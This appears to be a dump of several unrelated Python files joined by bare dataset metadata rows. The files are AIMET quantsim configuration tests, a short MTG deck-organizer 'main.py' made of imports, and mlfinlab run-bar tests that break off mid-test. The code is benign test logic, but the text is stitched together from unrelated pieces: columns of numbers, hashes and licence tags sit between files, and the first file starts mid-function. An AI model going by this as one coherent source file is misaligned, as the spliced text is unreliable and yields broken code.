        os.remove('./data/quantsim_config.json')
def test_check_correctness_of_dtype_bw_rules_op_level_supported_kernels_exception_case(self):
    """
    Test to check api check_correctness_of_dtype_bw_rules, invalid op level supported_kernels case
    :return:
    """
    model = SingleResidual()
    model.eval()
    # Conv's op-level kernel (param bw 4) conflicts with the defaults (param bw 8): invalid config
    quantsim_config = {
        "defaults": {
            "ops": {
                "is_output_quantized": "True"
            },
            "params": {
                "is_quantized": "True"
            },
            "supported_kernels": [
                {
                    "activation": {
                        "bitwidth": 8,
                        "dtype": "int"
                    },
                    "param": {
                        "bitwidth": 8,
                        "dtype": "int"
                    }
                }
            ]
        },
        "params": {
            "bias": {
                "is_quantized": "False"
            }
        },
        "op_type": {
            "Conv": {
                "supported_kernels":
                [
                    {
                        "activation": {
                            "bitwidth": 8,
                            "dtype": "int"
                        },
                        "param": {
                            "bitwidth": 4,
                            "dtype": "int"
                        }
                    },
                ],
                "is_input_quantized": "True",
                "is_output_quantized": "True",
                "params": {
                    "weight": {
                        "is_quantized": "True"
                    },
                    "bias": {
                        "is_quantized": "False"
                    }
                }
            }
        },
        "supergroups": [
        ],
        "model_input": {
            "is_input_quantized": "True"
        },
        "model_output": {}
    }
    config_file = './data/quantsim_config.json'
    with open(config_file, 'w') as f:
        json.dump(quantsim_config, f)
    INPUT_SHAPE = (1, 3, 32, 32)
    # NOTE: the previously-defined 'forward_fn' helper was never used and has been removed
    supported_kernels = {}
    from aimet_torch.quantsim_config.quantsim_config import QuantSimConfigurator
    dummy_input = torch.randn(INPUT_SHAPE)
    connected_graph = ConnectedGraph(model, dummy_input)
    # Named 'configurator' (was 'qsim_config') to avoid shadowing the module-level
    # qsim_config import used elsewhere for ENFORCE_TARGET_DTYPE_BITWIDTH_CONFIG
    configurator = QuantSimConfigurator(model, connected_graph, config_file, supported_kernels,
                                        quantsim_output_bw=8, quantsim_param_bw=8,
                                        quantsim_data_type=QuantizationDataType.int)
    qsim_dtype_bw = QuantDtypeBwInfo(data_type=QuantizationDataType.int, act_bw=8, param_bw=8)
    # The invalid op-level supported_kernels entry must make the check raise NotImplementedError
    exception_raised = False
    try:
        configurator.check_correctness_of_dtype_bw_rules(qsim_dtype_bw)
    except NotImplementedError as exc:
        print(" Test raised exception as expected ", exc)
        exception_raised = True
    assert exception_raised
    # remove test config created
    if os.path.exists(config_file):
        os.remove(config_file)
def test_target_rule_enforced_apply_default_and_op_level_overrides_valid_case(self):
        """
        Validates that the config overrides provided are a valid combination, and checks
        application of both default-level as well as op-level kernel overrides for dtype
        and bitwidth.
        Quantsim created with (int4, int4) defaults.
        Default supported_kernels override (at index 0) is (int8, int8) --> applied.
        Op-level override at index 0 of supported_kernels for Conv type is
        (fp16, fp16) --> applied to weight param.
        :return: None
        """
        model = SingleResidual()
        model.eval()
        # quantsim config has default kernel overrides as well as op level kernel override
        # we begin with quantsim default config (int4, int4), during instantiation of quantsim object.
        # Then, using config file we apply two levels of overrides.
        # 1) default supported_kernels at index 0 is used to override default act/param bw dtype with int8 / int8
        # 2) After this, at op level, specifically for Conv types, there is an override provided as fp16 / fp16
        # So, param quantizers of conv shall be updated to FP16 as an override, while retaining output at int8 as
        # configured by default level supported_kernels.
        quantsim_config = {
            "defaults": {
                "ops": {
                    "is_output_quantized": "True"
                },
                "params": {
                    "is_quantized": "True"
                },
                "supported_kernels": [
                    {
                        "activation": {
                            "bitwidth": 8,
                            "dtype": "int"
                        },
                        "param": {
                            "bitwidth": 8,
                            "dtype": "int"
                        }
                    },
                    {
                        "activation": {
                            "bitwidth": 4,
                            "dtype": "int"
                        },
                        "param": {
                            "bitwidth": 4,
                            "dtype": "int"
                        }
                    }
                ]
            },
            "params": {
                "bias": {
                    "is_quantized": "False"
                }
            },
            "op_type": {
                "Conv": {
                    "is_input_quantized": "True",
                    "is_output_quantized": "True",
                    "params": {
                        "weight": {
                            "is_quantized": "True"
                        },
                        "bias": {
                            "is_quantized": "False"
                        }
                    },
                    "supported_kernels":
                        [
                            {
                                "activation": {
                                    "bitwidth": 16,
                                    "dtype": "float"
                                },
                                "param": {
                                    "bitwidth": 16,
                                    "dtype": "float"
                                }
                            },
                        ]
                }
            },
            "supergroups": [
            ],
            "model_input": {
                "is_input_quantized": "True"
            },
            "model_output": {}
        }
        # write the test config that QuantizationSimModel consumes below
        with open('./data/quantsim_config.json', 'w') as f:
            json.dump(quantsim_config, f)
        INPUT_SHAPE = (1, 3, 32, 32)
        def forward_fn(model, _):
            # deterministic forward pass used only to compute encodings
            torch.manual_seed(10)
            model.eval()
            with torch.no_grad():
                _ = model(torch.randn(INPUT_SHAPE))
        # set enforce to true for this test
        qsim_config.ENFORCE_TARGET_DTYPE_BITWIDTH_CONFIG = True
        sim = QuantizationSimModel(model, quant_scheme=QuantScheme.post_training_tf_enhanced,
                                   config_file='./data/quantsim_config.json',
                                   dummy_input=torch.rand(1, 3, 32, 32), in_place=True,
                                   default_data_type=QuantizationDataType.int, default_output_bw=4, default_param_bw=4)
        sim.compute_encodings(forward_fn, forward_pass_callback_args=None)
        # enforce is set to true
        # default supported kernels at index DEFAULT_OVERRIDE_SUPPORTED_KERNEL_INDEX (=0 in this case)
        # is not same as default quantsim bw and dtype (int4/int4), so default overrides (int8/int8) are applied.
        assert(sim.model.fc.param_quantizers['weight'].enabled)
        assert(sim.model.fc.param_quantizers['bias'].enabled == False)
        assert(sim.model.fc.param_quantizers['weight'].bitwidth == 8)
        assert(sim.model.fc.param_quantizers['weight'].data_type == QuantizationDataType.int)
        assert(sim.model.fc.param_quantizers['bias'].bitwidth == 8)
        assert(sim.model.fc.param_quantizers['bias'].data_type == QuantizationDataType.int)
        assert(sim.model.fc.output_quantizers[0].bitwidth == 8)
        assert(sim.model.fc.output_quantizers[0].data_type == QuantizationDataType.int)
        assert(sim.model.relu1.output_quantizers[0].bitwidth == 8)
        assert(sim.model.relu1.output_quantizers[0].data_type == QuantizationDataType.int)
        # at op level (for Conv) check param quantizers are updated to fp16 while output is still retained at int8
        assert(sim.model.conv1.param_quantizers['weight'].enabled == True)
        assert(sim.model.conv1.param_quantizers['weight'].bitwidth == 16)
        assert(sim.model.conv1.param_quantizers['weight'].data_type == QuantizationDataType.float)
        assert(sim.model.conv1.output_quantizers[0].bitwidth == 8)
        assert(sim.model.conv1.output_quantizers[0].data_type == QuantizationDataType.int)
        # restore the global flag and remove test config created
        qsim_config.ENFORCE_TARGET_DTYPE_BITWIDTH_CONFIG = False
        if os.path.exists('./data/quantsim_config.json'):
            os.remove('./data/quantsim_config.json')
def test_target_rule_enforced_apply_default_and_op_level_overrides_invalid_case(self):
        """
        Tests application of an override config rule combination that is NOT valid:
        the default-level override is (fp16, fp16) while the Conv op-level kernel is
        lower precision (int8, int8), so quantsim construction is expected to raise.
        :return: None
        """
        model = SingleResidual()
        model.eval()
        # quantsim config has default kernel overrides as well as op level kernel override
        # we begin with quantsim default config (int4, int4), during instantiation of quantsim object.
        # Then, using config file we apply two levels of overrides.
        # 1) default supported_kernels at index 0 is used to override default act/param bw dtype with fp16 / fp16
        # 2) After this, at op level, specifically for Conv types, there is an override provided as int8 / int8
        # (NOTE: lower precision than the default-level override -- this is the invalid combination under test)
        quantsim_config = {
            "defaults": {
                "ops": {
                    "is_output_quantized": "True"
                },
                "params": {
                    "is_quantized": "True"
                },
                "supported_kernels": [
                    {
                        "activation": {
                            "bitwidth": 16,
                            "dtype": "float"
                        },
                        "param": {
                            "bitwidth": 16,
                            "dtype": "float"
                        }
                    },
                    {
                        "activation": {
                            "bitwidth": 4,
                            "dtype": "int"
                        },
                        "param": {
                            "bitwidth": 4,
                            "dtype": "int"
                        }
                    }
                ]
            },
            "params": {
                "bias": {
                    "is_quantized": "False"
                }
            },
            "op_type": {
                "Conv": {
                    "is_input_quantized": "True",
                    "is_output_quantized": "True",
                    "params": {
                        "weight": {
                            "is_quantized": "True"
                        },
                        "bias": {
                            "is_quantized": "False"
                        }
                    },
                    "supported_kernels":
                        [
                            {
                                "activation": {
                                    "bitwidth": 8,
                                    "dtype": "int"
                                },
                                "param": {
                                    "bitwidth": 8,
                                    "dtype": "int"
                                }
                            },
                        ]
                }
            },
            "supergroups": [
            ],
            "model_input": {
                "is_input_quantized": "True"
            },
            "model_output": {}
        }
        # write the test config that QuantizationSimModel consumes below
        with open('./data/quantsim_config.json', 'w') as f:
            json.dump(quantsim_config, f)
        INPUT_SHAPE = (1, 3, 32, 32)
        def forward_fn(model, _):
            # deterministic forward pass (unused here since quantsim creation itself should fail)
            torch.manual_seed(10)
            model.eval()
            with torch.no_grad():
                _ = model(torch.randn(INPUT_SHAPE))
        # set enforce to true for this test
        qsim_config.ENFORCE_TARGET_DTYPE_BITWIDTH_CONFIG = True
        # enforce is set to true
        # default supported kernels at index DEFAULT_OVERRIDE_SUPPORTED_KERNEL_INDEX (=0 in this case)
        # is not same as default quantsim bw and dtype (int4/int4), apply default overrides (fp16/fp16).
        # So, default qsim is created with fp16/fp16 as per default level supported_kernels at override index.
        # But, op level has a kernel that is lower precision (int8, int8) as compared to this.
        # So, the rule checker should flag this and cause an exception in this case.
        exception_raised = False
        try:
            sim = QuantizationSimModel(model, quant_scheme=QuantScheme.post_training_tf_enhanced,
                                       config_file='./data/quantsim_config.json',
                                       dummy_input=torch.rand(1, 3, 32, 32), in_place=True,
                                       default_data_type=QuantizationDataType.int, default_output_bw=4, default_param_bw=4)
        except NotImplementedError as exc:
            exception_raised = True
            print(" Test raised exception as expected ", exc)
        assert exception_raised
        # restore the global flag and remove test config created
        qsim_config.ENFORCE_TARGET_DTYPE_BITWIDTH_CONFIG = False
        if os.path.exists('./data/quantsim_config.json'):
            os.remove('./data/quantsim_config.json')
def test_target_rule_enforced_apply_op_level_overrides_fp16(self):
        """
        Validates that the config overrides provided are a valid combination and checks
        application of aic100-specific rules.
        No default supported_kernels override; op-level FP16 support for LayerNorm and GELU.
        Quantsim created with (int8, int8) defaults.
        a) Default supported kernels override not provided.
        b) Op-level override at index 0 of supported_kernels for LayerNorm/GELU type is
        (fp16, fp16) --> applied to params.
        For GELU, nothing is applied, as it has no params; output is retained at int8.
        :return: None
        """
        # aic100, no default supported kernels, op level for layernorm and gelu
        quantsim_config = {
            "defaults": {
                "ops": {
                    "is_output_quantized": "True"
                },
                "params": {
                    "is_quantized": "True"
                }
            },
            "params": {},
            "op_type": {
                "LayerNorm": {
                    "supported_kernels":
                        [
                            {
                                "activation": {
                                    "bitwidth": 16,
                                    "dtype": "float"
                                },
                                "param": {
                                    "bitwidth": 16,
                                    "dtype": "float"
                                }
                            },
                        ]
                },
                "GELU": {
                    "is_output_quantized": "True",
                    "supported_kernels":
                        [
                            {
                                "activation": {
                                    "bitwidth": 16,
                                    "dtype": "float"
                                },
                                "param": {
                                    "bitwidth": 16,
                                    "dtype": "float"
                                }
                            },
                        ]
                }
            },
            "supergroups": [],
            "model_input": {},
            "model_output": {}
        }
        # write the test config that QuantizationSimModel consumes below
        with open('./data/quantsim_config.json', 'w') as f:
            json.dump(quantsim_config, f)
        torch.manual_seed(10)
        model = ModelWithBertCustomLayerNormGelu()
        model.eval()
        random_input = torch.rand(1, 4, 4)
        def forward_pass(model, args):
            # defined for completeness; compute_encodings is not invoked in this test
            model.eval()
            with torch.no_grad():
                model(*random_input)
        qsim_config.ENFORCE_TARGET_DTYPE_BITWIDTH_CONFIG = True
        sim = QuantizationSimModel(model, quant_scheme=QuantScheme.post_training_tf,
                                   dummy_input=random_input, default_data_type=QuantizationDataType.int,
                                   default_output_bw=8, default_param_bw=8,
                                   config_file='./data/quantsim_config.json')
        # enforce is set to true
        # LayerNorm params should be set to FP16, while output is maintained at quantsim defaults (int8)
        assert(sim.model.customln1.output_quantizer.data_type == QuantizationDataType.int)
        assert(sim.model.customln1.output_quantizer.bitwidth == 8)
        # override this with custom config (matches aic100_config.json)
        assert(sim.model.customln1.param_quantizers['weight'].data_type == QuantizationDataType.float)
        assert(sim.model.customln1.param_quantizers['weight'].bitwidth == 16)
        # gelu output should be retained at quantsim defaults (int8) although it has supported_kernels = FP16
        # as this op doesn't have params
        assert(sim.model.gelu1.output_quantizer.data_type == QuantizationDataType.int)
        assert(sim.model.gelu1.output_quantizer.bitwidth == 8)
        # restore the global flag and remove test config created
        qsim_config.ENFORCE_TARGET_DTYPE_BITWIDTH_CONFIG = False
        if os.path.exists('./data/quantsim_config.json'):
            os.remove('./data/quantsim_config.json')
| 40.939926
| 136
| 0.482327
| 6,745
| 77,008
| 5.299629
| 0.066271
| 0.059923
| 0.042802
| 0.052314
| 0.866251
| 0.850305
| 0.828848
| 0.816791
| 0.809126
| 0.801069
| 0
| 0.013798
| 0.423073
| 77,008
| 1,880
| 137
| 40.961702
| 0.790785
| 0.137466
| 0
| 0.70915
| 0
| 0
| 0.131534
| 0.03532
| 0
| 0
| 0
| 0
| 0.098039
| 1
| 0.024183
| false
| 0.004575
| 0.013725
| 0
| 0.041176
| 0.001961
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
826c267c6f0e4c8fb3a779811a655bcb0a0e3dfb
| 218
|
py
|
Python
|
main.py
|
TiesWestendorp/MTG-Deck-Organizer
|
409185c1bcfc8bf70c441d3242ed10c7c41f9d90
|
[
"MIT"
] | null | null | null |
main.py
|
TiesWestendorp/MTG-Deck-Organizer
|
409185c1bcfc8bf70c441d3242ed10c7c41f9d90
|
[
"MIT"
] | null | null | null |
main.py
|
TiesWestendorp/MTG-Deck-Organizer
|
409185c1bcfc8bf70c441d3242ed10c7c41f9d90
|
[
"MIT"
] | null | null | null |
from commands import cards_not_in_decks
from commands import disjoint_bases
from commands import inventory_sum_decklists
from commands import inventory_union_decklists
from commands import simultaneously_constructible
| 36.333333
| 49
| 0.908257
| 29
| 218
| 6.517241
| 0.517241
| 0.31746
| 0.47619
| 0.285714
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.091743
| 218
| 5
| 50
| 43.6
| 0.954545
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
827f78838e906c745628bfceb8e5c660408759b9
| 22,808
|
py
|
Python
|
mlfinlab/tests/test_run_data_structures.py
|
scibol/mlfinlab
|
3c80f269bc68b8cb9bcf863ceb3dc77fc14b6984
|
[
"BSD-3-Clause"
] | 8
|
2020-04-19T08:09:34.000Z
|
2022-03-30T20:49:40.000Z
|
mlfinlab/tests/test_run_data_structures.py
|
scibol/mlfinlab
|
3c80f269bc68b8cb9bcf863ceb3dc77fc14b6984
|
[
"BSD-3-Clause"
] | 1
|
2019-07-24T17:52:30.000Z
|
2019-07-24T17:52:30.000Z
|
mlfinlab/tests/test_run_data_structures.py
|
scibol/mlfinlab
|
3c80f269bc68b8cb9bcf863ceb3dc77fc14b6984
|
[
"BSD-3-Clause"
] | 8
|
2020-08-09T02:25:04.000Z
|
2022-03-20T15:08:11.000Z
|
"""
Tests the financial data structures
"""
import unittest
import os
import numpy as np
import pandas as pd
from mlfinlab.data_structures import run_data_structures as ds
class TestDataStructures(unittest.TestCase):
    """
    Test the various financial data structures:
    1. Run Dollar bars
    2. Run Volume bars
    3. Run Tick bars

    Each test builds bars from the same tick fixture with several batch sizes and
    asserts that the output is batch-size invariant and matches known OHLC values.
    """

    def setUp(self):
        """
        Set the file path for the tick data csv fixture.
        """
        project_path = os.path.dirname(__file__)
        self.path = project_path + '/test_data/imbalance_sample_data.csv'

    def test_ema_run_dollar_bars(self):
        """
        Tests the EMA run dollar bars implementation.
        """
        exp_num_ticks_init = 1000
        num_prev_bars = 3
        db1, thresh_1 = ds.get_ema_dollar_run_bars(self.path, exp_num_ticks_init=exp_num_ticks_init,
                                                   expected_imbalance_window=10000,
                                                   num_prev_bars=num_prev_bars, batch_size=2e7, verbose=False,
                                                   analyse_thresholds=True)
        db2, thresh_2 = ds.get_ema_dollar_run_bars(self.path, exp_num_ticks_init=exp_num_ticks_init,
                                                   expected_imbalance_window=10000,
                                                   num_prev_bars=num_prev_bars, batch_size=50, verbose=False,
                                                   analyse_thresholds=True)
        db3, _ = ds.get_ema_dollar_run_bars(self.path, exp_num_ticks_init=exp_num_ticks_init,
                                            expected_imbalance_window=10000,
                                            num_prev_bars=num_prev_bars, batch_size=10, verbose=False)
        ds.get_ema_dollar_run_bars(self.path, exp_num_ticks_init=exp_num_ticks_init,
                                   expected_imbalance_window=10000,
                                   num_prev_bars=num_prev_bars, batch_size=50, verbose=False,
                                   to_csv=True, output_path='test.csv')
        db4 = pd.read_csv('test.csv', parse_dates=[0])
        self.assertEqual(db1.shape, (3, 10))
        # Assert diff batch sizes have same number of bars
        self.assertTrue(db1.shape == db2.shape)
        self.assertTrue(db1.shape == db3.shape)
        self.assertTrue(db1.shape == db4.shape)
        # Assert same values
        self.assertTrue(np.all(db1.values == db2.values))
        self.assertTrue(np.all(db1.values == db3.values))
        self.assertTrue(np.all(db1.values == db4.values))
        self.assertTrue(np.all(thresh_1.cum_theta_buy == thresh_2.cum_theta_buy))
        self.assertTrue(np.all(thresh_1.cum_theta_sell == thresh_2.cum_theta_sell))
        # Assert OHLC is correct (the first value)
        self.assertEqual(db1.loc[0, 'open'], 1306.0)
        self.assertEqual(db1.loc[0, 'high'], 1306.0)
        self.assertEqual(db1.loc[0, 'low'], 1303.00)
        self.assertEqual(db1.loc[0, 'close'], 1305.75)
        # Assert OHLC is correct (the last value)
        self.assertEqual(db1.loc[2, 'open'], 1307.25)
        self.assertEqual(db1.loc[2, 'high'], 1307.25)
        self.assertEqual(db1.loc[2, 'low'], 1302.25)
        self.assertEqual(db1.loc[2, 'close'], 1302.25)
        self.assertTrue((db1.loc[:, 'high'] >= db1.loc[:, 'low']).all())
        self.assertTrue((db1.loc[:, 'volume'] >= db1.loc[:, 'cum_buy_volume']).all())
        # Delete generated csv file (if it wasn't generated test would fail)
        os.remove('test.csv')

    def test_ema_run_volume_bars(self):
        """
        Tests the EMA run volume bars implementation.
        """
        exp_num_ticks_init = 1000
        num_prev_bars = 3
        db1, thresh_1 = ds.get_ema_volume_run_bars(self.path, exp_num_ticks_init=exp_num_ticks_init,
                                                   expected_imbalance_window=10000,
                                                   num_prev_bars=num_prev_bars, batch_size=2e7, verbose=False,
                                                   analyse_thresholds=True)
        db2, thresh_2 = ds.get_ema_volume_run_bars(self.path, exp_num_ticks_init=exp_num_ticks_init,
                                                   expected_imbalance_window=10000,
                                                   num_prev_bars=num_prev_bars, batch_size=50, verbose=False,
                                                   analyse_thresholds=True)
        db3, _ = ds.get_ema_volume_run_bars(self.path, exp_num_ticks_init=exp_num_ticks_init,
                                            expected_imbalance_window=10000,
                                            num_prev_bars=num_prev_bars, batch_size=10, verbose=False)
        ds.get_ema_volume_run_bars(self.path, exp_num_ticks_init=exp_num_ticks_init,
                                   expected_imbalance_window=10000,
                                   num_prev_bars=num_prev_bars, batch_size=50, verbose=False,
                                   to_csv=True, output_path='test.csv')
        db4 = pd.read_csv('test.csv', parse_dates=[0])
        self.assertEqual(db1.shape, (3, 10))
        # Assert diff batch sizes have same number of bars
        self.assertTrue(db1.shape == db2.shape)
        self.assertTrue(db1.shape == db3.shape)
        self.assertTrue(db1.shape == db4.shape)
        # Assert same values
        self.assertTrue(np.all(db1.values == db2.values))
        self.assertTrue(np.all(db1.values == db3.values))
        self.assertTrue(np.all(db1.values == db4.values))
        self.assertTrue(np.all(thresh_1.cum_theta_buy == thresh_2.cum_theta_buy))
        self.assertTrue(np.all(thresh_1.cum_theta_sell == thresh_2.cum_theta_sell))
        # Assert OHLC is correct (the first value)
        self.assertEqual(db1.loc[0, 'open'], 1306.0)
        self.assertEqual(db1.loc[0, 'high'], 1306.0)
        self.assertEqual(db1.loc[0, 'low'], 1303.00)
        self.assertEqual(db1.loc[0, 'close'], 1305.75)
        # Assert OHLC is correct (the last value)
        self.assertEqual(db1.loc[2, 'open'], 1307.25)
        self.assertEqual(db1.loc[2, 'high'], 1307.25)
        self.assertEqual(db1.loc[2, 'low'], 1302.25)
        self.assertEqual(db1.loc[2, 'close'], 1302.25)
        self.assertTrue((db1.loc[:, 'high'] >= db1.loc[:, 'low']).all())
        self.assertTrue((db1.loc[:, 'volume'] >= db1.loc[:, 'cum_buy_volume']).all())
        # Delete generated csv file (if it wasn't generated test would fail)
        os.remove('test.csv')

    def test_ema_run_tick_bars(self):
        """
        Tests the EMA run tick bars implementation.
        """
        exp_num_ticks_init = 1000
        num_prev_bars = 3
        db1, thresh_1 = ds.get_ema_tick_run_bars(self.path, exp_num_ticks_init=exp_num_ticks_init,
                                                 expected_imbalance_window=10000,
                                                 num_prev_bars=num_prev_bars, batch_size=2e7, verbose=False,
                                                 analyse_thresholds=True)
        db2, thresh_2 = ds.get_ema_tick_run_bars(self.path, exp_num_ticks_init=exp_num_ticks_init,
                                                 expected_imbalance_window=10000,
                                                 num_prev_bars=num_prev_bars, batch_size=50, verbose=False,
                                                 analyse_thresholds=True)
        db3, _ = ds.get_ema_tick_run_bars(self.path, exp_num_ticks_init=exp_num_ticks_init,
                                          expected_imbalance_window=10000,
                                          num_prev_bars=num_prev_bars, batch_size=10, verbose=False)
        ds.get_ema_tick_run_bars(self.path, exp_num_ticks_init=exp_num_ticks_init,
                                 expected_imbalance_window=10000,
                                 num_prev_bars=num_prev_bars, batch_size=50, verbose=False,
                                 to_csv=True, output_path='test.csv')
        db4 = pd.read_csv('test.csv', parse_dates=[0])
        self.assertEqual(db1.shape, (4, 10))
        # Assert diff batch sizes have same number of bars
        self.assertTrue(db1.shape == db2.shape)
        self.assertTrue(db1.shape == db3.shape)
        self.assertTrue(db1.shape == db4.shape)
        # Assert same values
        self.assertTrue(np.all(db1.values == db2.values))
        self.assertTrue(np.all(db1.values == db3.values))
        self.assertTrue(np.all(db1.values == db4.values))
        self.assertTrue(np.all(thresh_1.cum_theta_buy == thresh_2.cum_theta_buy))
        self.assertTrue(np.all(thresh_1.cum_theta_sell == thresh_2.cum_theta_sell))
        # Assert OHLC is correct (the first value)
        self.assertEqual(db1.loc[0, 'open'], 1306.0)
        self.assertEqual(db1.loc[0, 'high'], 1306.0)
        self.assertEqual(db1.loc[0, 'low'], 1303.00)
        self.assertEqual(db1.loc[0, 'close'], 1305.75)
        # Assert OHLC is correct (the third value)
        self.assertEqual(db1.loc[2, 'open'], 1307.25)
        self.assertEqual(db1.loc[2, 'high'], 1307.75)
        self.assertEqual(db1.loc[2, 'low'], 1303.5)
        self.assertEqual(db1.loc[2, 'close'], 1304.5)
        self.assertTrue((db1.loc[:, 'high'] >= db1.loc[:, 'low']).all())
        self.assertTrue((db1.loc[:, 'volume'] >= db1.loc[:, 'cum_buy_volume']).all())
        # Delete generated csv file (if it wasn't generated test would fail)
        os.remove('test.csv')

    def test_ema_run_dollar_bars_with_constraints(self):
        """
        Test the EMA Dollar Run bars with expected number of ticks max and min constraints.
        """
        exp_num_ticks_init = 1000
        num_prev_bars = 3
        exp_num_ticks_constraints = [100, 1000]
        db1, _ = ds.get_ema_dollar_run_bars(self.path, exp_num_ticks_init=exp_num_ticks_init,
                                            expected_imbalance_window=10000,
                                            exp_num_ticks_constraints=exp_num_ticks_constraints,
                                            num_prev_bars=num_prev_bars, batch_size=2e7, verbose=False)
        db2, _ = ds.get_ema_dollar_run_bars(self.path, exp_num_ticks_init=exp_num_ticks_init,
                                            expected_imbalance_window=10000,
                                            exp_num_ticks_constraints=exp_num_ticks_constraints,
                                            num_prev_bars=num_prev_bars, batch_size=50, verbose=False)
        db3, _ = ds.get_ema_dollar_run_bars(self.path, exp_num_ticks_init=exp_num_ticks_init,
                                            expected_imbalance_window=10000,
                                            exp_num_ticks_constraints=exp_num_ticks_constraints,
                                            num_prev_bars=num_prev_bars, batch_size=10, verbose=False)
        ds.get_ema_dollar_run_bars(self.path, exp_num_ticks_init=exp_num_ticks_init,
                                   expected_imbalance_window=10000,
                                   exp_num_ticks_constraints=exp_num_ticks_constraints,
                                   num_prev_bars=num_prev_bars, batch_size=50, verbose=False,
                                   to_csv=True, output_path='test.csv')
        db4 = pd.read_csv('test.csv', parse_dates=[0])
        self.assertEqual(db1.shape, (9, 10))
        # Assert diff batch sizes have same number of bars
        self.assertTrue(db1.shape == db2.shape)
        self.assertTrue(db1.shape == db3.shape)
        self.assertTrue(db1.shape == db4.shape)
        # Assert same values
        self.assertTrue(np.all(db1.values == db2.values))
        self.assertTrue(np.all(db1.values == db3.values))
        self.assertTrue(np.all(db1.values == db4.values))
        # Assert OHLC is correct (the first value)
        self.assertEqual(db1.loc[0, 'open'], 1306.0)
        self.assertEqual(db1.loc[0, 'high'], 1306.0)
        self.assertEqual(db1.loc[0, 'low'], 1303.0)
        self.assertEqual(db1.loc[0, 'close'], 1305.75)
        self.assertTrue((db1.loc[:, 'high'] >= db1.loc[:, 'low']).all())
        # Assert OHLC is correct (some index)
        self.assertEqual(db1.loc[7, 'open'], 1302.5)
        self.assertEqual(db1.loc[7, 'high'], 1304.75)
        self.assertEqual(db1.loc[7, 'low'], 1301.75)
        self.assertEqual(db1.loc[7, 'close'], 1304.5)
        self.assertTrue((db1.loc[:, 'volume'] >= db1.loc[:, 'cum_buy_volume']).all())
        # Delete generated csv file (if it wasn't generated test would fail)
        os.remove('test.csv')

    def test_const_run_dollar_bars(self):
        """
        Tests the Const run dollar bars implementation.
        """
        exp_num_ticks_init = 1000
        num_prev_bars = 3
        db1, thresh_1 = ds.get_const_dollar_run_bars(self.path, exp_num_ticks_init=exp_num_ticks_init,
                                                     expected_imbalance_window=10000,
                                                     num_prev_bars=num_prev_bars, batch_size=2e7, verbose=False,
                                                     analyse_thresholds=True)
        db2, thresh_2 = ds.get_const_dollar_run_bars(self.path, exp_num_ticks_init=exp_num_ticks_init,
                                                     expected_imbalance_window=10000,
                                                     num_prev_bars=num_prev_bars, batch_size=50, verbose=False,
                                                     analyse_thresholds=True)
        db3, _ = ds.get_const_dollar_run_bars(self.path, exp_num_ticks_init=exp_num_ticks_init,
                                              expected_imbalance_window=10000,
                                              num_prev_bars=num_prev_bars, batch_size=10, verbose=False)
        ds.get_const_dollar_run_bars(self.path, exp_num_ticks_init=exp_num_ticks_init,
                                     expected_imbalance_window=10000,
                                     num_prev_bars=num_prev_bars, batch_size=50, verbose=False,
                                     to_csv=True, output_path='test.csv')
        db4 = pd.read_csv('test.csv', parse_dates=[0])
        self.assertEqual(db1.shape, (9, 10))
        # Assert diff batch sizes have same number of bars
        self.assertTrue(db1.shape == db2.shape)
        self.assertTrue(db1.shape == db3.shape)
        self.assertTrue(db1.shape == db4.shape)
        # Assert same values
        self.assertTrue(np.all(db1.values == db2.values))
        self.assertTrue(np.all(db1.values == db3.values))
        self.assertTrue(np.all(db1.values == db4.values))
        self.assertTrue(np.all(thresh_1.cum_theta_buy == thresh_2.cum_theta_buy))
        self.assertTrue(np.all(thresh_1.cum_theta_sell == thresh_2.cum_theta_sell))
        # Assert OHLC is correct (the first value)
        self.assertEqual(db1.loc[0, 'open'], 1306.0)
        self.assertEqual(db1.loc[0, 'high'], 1306.0)
        self.assertEqual(db1.loc[0, 'low'], 1303.00)
        self.assertEqual(db1.loc[0, 'close'], 1305.75)
        # Assert OHLC is correct (the third value)
        self.assertEqual(db1.loc[2, 'open'], 1306.0)
        self.assertEqual(db1.loc[2, 'high'], 1307.75)
        self.assertEqual(db1.loc[2, 'low'], 1305.75)
        self.assertEqual(db1.loc[2, 'close'], 1307.75)
        self.assertTrue((db1.loc[:, 'high'] >= db1.loc[:, 'low']).all())
        self.assertTrue((db1.loc[:, 'volume'] >= db1.loc[:, 'cum_buy_volume']).all())
        # Delete generated csv file (if it wasn't generated test would fail)
        os.remove('test.csv')

    def test_const_run_volume_bars(self):
        """
        Tests the Const run volume bars implementation.
        """
        exp_num_ticks_init = 1000
        num_prev_bars = 3
        db1, thresh_1 = ds.get_const_volume_run_bars(self.path, exp_num_ticks_init=exp_num_ticks_init,
                                                     expected_imbalance_window=10000,
                                                     num_prev_bars=num_prev_bars, batch_size=2e7, verbose=False,
                                                     analyse_thresholds=True)
        db2, thresh_2 = ds.get_const_volume_run_bars(self.path, exp_num_ticks_init=exp_num_ticks_init,
                                                     expected_imbalance_window=10000,
                                                     num_prev_bars=num_prev_bars, batch_size=50, verbose=False,
                                                     analyse_thresholds=True)
        db3, _ = ds.get_const_volume_run_bars(self.path, exp_num_ticks_init=exp_num_ticks_init,
                                              expected_imbalance_window=10000,
                                              num_prev_bars=num_prev_bars, batch_size=10, verbose=False)
        ds.get_const_volume_run_bars(self.path, exp_num_ticks_init=exp_num_ticks_init,
                                     expected_imbalance_window=10000,
                                     num_prev_bars=num_prev_bars, batch_size=50, verbose=False,
                                     to_csv=True, output_path='test.csv')
        db4 = pd.read_csv('test.csv', parse_dates=[0])
        self.assertEqual(db1.shape, (9, 10))
        # Assert diff batch sizes have same number of bars
        self.assertTrue(db1.shape == db2.shape)
        self.assertTrue(db1.shape == db3.shape)
        self.assertTrue(db1.shape == db4.shape)
        # Assert same values
        self.assertTrue(np.all(db1.values == db2.values))
        self.assertTrue(np.all(db1.values == db3.values))
